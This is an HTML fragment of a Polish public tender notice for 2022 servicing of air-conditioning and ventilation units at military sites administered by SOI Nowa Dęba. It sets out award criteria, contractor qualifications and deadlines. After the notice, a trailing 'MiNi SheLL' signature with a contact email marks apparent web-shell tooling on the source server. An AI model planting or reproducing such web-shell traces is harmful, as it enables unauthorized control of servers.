class="normal">42500000-1 - Urządzenia chłodzące i wentylacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny wyłącznie ofert niepodlegających odrzuceniu.<br/>Zamawiający dokona oceny ofert odrębnie dla każdej z części na jakie zostało podzielone zamówienie.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający w odniesieniu do każdej z części na jakie zostało podzielone zamówienie, będzie kierował się niżej opisanymi kryteriami:<br/><br/>Cena ofertowa brutto zamówienia 60 pkt<br/> <br/>Czas reakcji na usunięcie awarii	40 pkt<br/> <br/>Oferty będą oceniane według poniższych wzorów i zasad:<br/>Kryterium CENA OFERTOWA BRUTTO ZAMÓWIENIA PODSTAWOWEGO<br/>- waga 60 pkt<br/>C=Cn/Cb x 60 pkt<br/>gdzie: <br/>C – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium cena 60 pkt;<br/>Cn – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu;<br/>CB – zaproponowana cena oferty badanej.<br/><br/>Kryterium CZAS REAKCJI NA USUNIĘCIE AWARII – waga 40 pkt<br/><br/>Czas reakcji na usunięcie awarii do 12 godzin – 40 pkt<br/>Czas reakcji na usunięcie awarii do 18 godzin – 20 pkt<br/>Czas reakcji na usunięcie awarii do 24 godzin – 0 pkt (czas reakcji wymagany przez Zamawiającego)<br/><br/>Jeżeli Wykonawca wskaże czas reakcji serwisu na zgłoszenie awarii dłuższy niż 24 godziny jego oferta zostanie odrzucona jako niespełniająca wymagań postawionych w niniejszym postępowaniu o udzielenie zamówienia publicznego.<br/><br/>Oferta Wykonawcy, który nie określił w swojej ofercie czasu reakcji serwisu na zgłoszenie awarii zostanie potraktowana jak oferta z czasem reakcji serwisu na zgłoszenie awarii do 24 godzin.<br/><br/>Oferta Wykonawcy, który zaproponuje czas reakcji serwisu na zgłoszenie awarii krótszy aniżeli 12 godzin zostanie potraktowana jak oferta z 12 godzinnym czasem reakcji.<br/><br/>Zamawiający w toku badania i oceny ofert poprawi w ofercie:<br/>-oczywiste omyłki pisarskie;<br/>-oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek;<br/>-inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty; <br/>- niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>Zamówienie udzielone zostanie temu Wykonawcy, który:<br/>-spełni wymagania określone w niniejszej SWZ;<br/>-przedłoży ofertę, która uzyska największą liczbę punktów we wskazanym kryterium oceny ofert – cena + czas reakcji na usunięcie awarii.<br/>Obliczając punktację dla poszczególnych ofert, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, Zamawiający wzywa Wykonawcę, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznaczonym przez Zamawiającego terminie pisemnej zgody na wybór jego oferty. <br/>W przypadku braku zgody o której mowa w zdaniu poprzedzającym Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została kolejno najwyżej oceniona, chyba że zachodzą przesłanki unieważnienia postępowania.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i taki sam bilans innego kryterium, Zamawiający wezwie do złożenia w wyznaczonym przez siebie terminie ofert dodatkowych, zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czar reakcji na usunięcie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - wykonanie przeglądów, konserwacji i serwisowanie klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach wojskowych administrowanych przez SOI Nowa Dęba.<br/><br/>3)	Zakres czynności objętych przedmiotem niniejszego zamówienia obejmuje <br/>w szczególności: <br/>a)	kontrolę filtrów i wymienników, czyszczenie filtrów powietrza, parowacza, skraplacza, odgrzybianie oraz ewentualną wymianę filtrów do central wentylacyjnych na koszt Wykonawcy;<br/>b)	kontrolę wentylatorów, kontrolą mocowań i ułożyskowania, ewentualną wymianę łożysk na koszt Wykonawcy, kontrola stanu technicznego silnika;<br/>c)	kontrolę instalacji odprowadzania skropli, kontrola drożności, połączeń klejonych, stanu tacy ociekowej, stanu pompki skroplin;<br/>d)	kontrolę stanu izolacji zimnochronnej, oględziny ogólne, uzupełnienie braków izolacji;<br/>e)	kontrolę połączeń i parametrów elektrycznych, oględziny ogólne, kontrolę połączeń elektrycznych, pomiar prądów wentylatorów i kompresora;<br/>f)	sterownik klimatyzatora;<br/>g)	kontrolę instalacji chłodniczej, oględziny ogólne, kontrolę szczelności oraz ewentualne uszczelnienie i uzupełnienie czynnika chłodniczego, koncentratu do parowników i koncentratu do skraplaczy na koszt Wykonawcy;<br/>h)	kontrola sprężarki chłodniczej, ciśnienia na ssaniu i tłoczeniu sprężarki.<br/>- z wszelkich wykonywanych pomiarów Wykonawca sporządzi protokoły, które następnie przekaże Zamawiającemu.<br/>4)	Szczegółowy zakres prac objętych przedmiotem niniejszego zamówienia, dla każdej z części, na jakie zostało podzielone zamówienie został przedstawiony w załączniku do SWZ – Opis przedmiotu zamówienia;<br/>5)	Formularze szczegółowej wyceny, sporządzone odrębnie dla każdej z części na jakie zostało podzielone zamówienie stanowią również uzupełnienie opisu przedmiotu zamówienia. <br/>6)	Integralną część niniejszej SWZ oraz uzupełnienie Opisu przedmiotu zamówienia stanowi Wykaz urządzeń klimatyzacyjnych podlegających serwisowaniu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34225,61 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42500000-1 - Urządzenia chłodzące i wentylacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42510000-4 - Wymienniki ciepła, urządzenia do konfekcjonowania powietrza i urządzenia chłodzące oraz maszyny filtrujące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny wyłącznie ofert niepodlegających odrzuceniu.<br/>Zamawiający dokona oceny ofert odrębnie dla każdej z części na jakie zostało podzielone zamówienie.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający w odniesieniu do każdej z części na jakie zostało podzielone zamówienie, będzie kierował się niżej opisanymi kryteriami:<br/><br/>Cena ofertowa brutto zamówienia 60 pkt<br/> <br/>Czas reakcji na usunięcie awarii	40 pkt<br/> <br/>Oferty będą oceniane według poniższych wzorów i zasad:<br/>Kryterium CENA OFERTOWA BRUTTO ZAMÓWIENIA PODSTAWOWEGO<br/>- waga 60 pkt<br/>C=Cn/Cb x 60 pkt<br/>gdzie: <br/>C – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium cena 60 pkt;<br/>Cn – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu;<br/>CB – zaproponowana cena oferty badanej.<br/><br/>Kryterium CZAS REAKCJI NA USUNIĘCIE AWARII – waga 40 pkt<br/><br/>Czas reakcji na usunięcie awarii do 12 godzin – 40 pkt<br/>Czas reakcji na usunięcie awarii do 18 godzin – 20 pkt<br/>Czas reakcji na usunięcie awarii do 24 godzin – 0 pkt (czas reakcji wymagany przez Zamawiającego)<br/><br/>Jeżeli Wykonawca wskaże czas reakcji serwisu na zgłoszenie awarii dłuższy niż 24 godziny jego oferta zostanie odrzucona jako niespełniająca wymagań postawionych w niniejszym postępowaniu o udzielenie zamówienia publicznego.<br/><br/>Oferta Wykonawcy, który nie określił w swojej ofercie czasu reakcji serwisu na zgłoszenie awarii zostanie potraktowana jak oferta z czasem reakcji serwisu na zgłoszenie awarii do 24 godzin.<br/><br/>Oferta Wykonawcy, który zaproponuje czas reakcji serwisu na zgłoszenie awarii krótszy aniżeli 12 godzin zostanie potraktowana jak oferta z 12 godzinnym czasem reakcji.<br/><br/>Zamawiający w toku badania i oceny ofert poprawi w ofercie:<br/>-oczywiste omyłki pisarskie;<br/>-oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek;<br/>-inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty; <br/>- niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>Zamówienie udzielone zostanie temu Wykonawcy, który:<br/>-spełni wymagania określone w niniejszej SWZ;<br/>-przedłoży ofertę, która uzyska największą liczbę punktów we wskazanym kryterium oceny ofert – cena + czas reakcji na usunięcie awarii.<br/>Obliczając punktację dla poszczególnych ofert, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, Zamawiający wzywa Wykonawcę, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznaczonym przez Zamawiającego terminie pisemnej zgody na wybór jego oferty. <br/>W przypadku braku zgody o której mowa w zdaniu poprzedzającym Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została kolejno najwyżej oceniona, chyba że zachodzą przesłanki unieważnienia postępowania.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i taki sam bilans innego kryterium, Zamawiający wezwie do złożenia w wyznaczonym przez siebie terminie ofert dodatkowych, zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czar reakcji na usunięcie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Warunek udziału w postępowaniu dotyczący zdolności do występowania <br/>w obrocie gospodarczym - Zamawiający nie stawia warunków udziału w tym zakresie.<br/><br/>2. Warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. – <br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia posiada uprawnienia do prowadzenia działalności <br/>w zakresie konserwacji i serwisowania lub naprawy strategicznych urządzeń chłodniczych, klimatyzacyjnych oraz wentylacji mechanicznej.<br/><br/>3.	Warunek udziału w postępowaniu dotyczące zdolności ekonomicznej lub finansowej- Zamawiający nie stawia warunków udziału w tym zakresie.<br/><br/>4.	Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej:<br/><br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował: <br/><br/>	co najmniej 1 osobą, która będzie uczestniczyć <br/>w realizacji zamówienia, posiadającą ważne kwalifikacje SEP uprawniające do eksploatacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu nieprzekraczającym 1 kV <br/><br/>oraz<br/><br/>	co najmniej 1 osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą przeszkolenie w zakresie instalacji, kontroli szczelności, konserwacji lub serwisowania a także naprawy i likwidacji stacjonarnych urządzeń chłodniczych, klimatyzacyjnych lub pomp ciepła, o którym mowa w art. 20 ustawy z dnia 15 maja 2015r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych.<br/><br/>Zamawiający dopuszcza możliwość dysponowania jedną osobą posiadającą w/w uprawnienia razem lub dwoma osobami posiadającymi każde z wymienionych uprawnień osobno. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykonawca wraz z ofertą zobowiązany jest złożyć aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp, wstępnie potwierdzające, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu w zakresie wskazanym w załączniku do SWZ.<br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni następujących dokumentów:<br/><br/>1)	potwierdzających brak podstaw wykluczenia:<br/><br/>aktualnego na dzień złożenia, oświadczenia Wykonawcy potwierdzającego aktualność informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawca wraz z ofertą zobowiązany jest złożyć aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp, wstępnie potwierdzające, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu <br/>w zakresie wskazanym w załączniku do SWZ.<br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni następujących dokumentów:<br/>1)	potwierdzających spełnienie warunków udziału w postępowaniu, dotyczących:<br/><br/>a)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/><br/>certyfikatu, o którym mowa w art. 29 ustawy z dnia 15 maja 2015r. <br/>o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych;<br/><br/>b)	zdolności technicznej lub zawodowej:<br/><br/>wykazu osób skierowanych przez Wykonawcę do realizacji przedmiotowego zadania wraz z informacją o posiadanych kwalifikacjach przez osobę skierowaną do realizacji zamówienia; Wzór wykazu stanowi załącznik do niniejszej SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca najpóźniej w dniu zawarcia umowy zobowiązany jest przedłożyć Zamawiającemu dokumenty potwierdzające posiadanie wymaganych uprawnień, przez osoby skierowane do realizacji niniejszego zamówienia, wskazane przez Wykonawcę w Wykazie osób, złożonym na wezwanie Zamawiającego oraz certyfikat dla personelu o którym mowa w art. 20 ustawy z dnia 15 maja 2015r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (Konsorcjum / wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy Pzp:<br/>1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia;<br/>2)	muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, zgodnie z art. 58 ust 2 ustawy Pzp - fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (pełnomocnictwa lub innych dokumentów z których wynikać będzie fakt ustanowienia pełnomocnika);<br/>3)	pełnomocnictwo lub inny dokument z którego treści będzie wynikało umocowanie ustanowionego pełnomocnika do reprezentowania każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy złożyć wraz z ofertą;<br/>4)	wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem;<br/>5)	jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana jako najkorzystniejsza, Zamawiający może wezwać do przedstawienia kopii umowy regulującej współpracę tych Wykonawców. <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są złożyć wraz z ofertą, oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp., z którego wynikać będzie które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-09 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/33wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-09 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Usługa stanowiąca przedmiot niniejszego zamówienia, w zakresie każdej z części, realizowana będzie w terminie 1 stycznia 2022r. do dnia 31 grudnia 2022r.<br/>2.	Umowa w sprawie zamówienia publicznego obowiązywać będzie od dnia jej zawarcia, jednak nie wcześniej niż od dnia 1 stycznia 2022r. do dnia 31 grudnia 2022r. <br/>3.	Termin wykonania pierwszego przeglądu przed okresem letnim – od dnia 1 maja 2022r. do dnia 30 maja 2022r.<br/>4.	Drugi przegląd poprzedzający okres zimowy wykonany zostanie w terminie od dnia 1 listopada 2022r. do dnia 30 listopada 2022r.

Creat By MiNi SheLL
Email: jattceo@gmail.com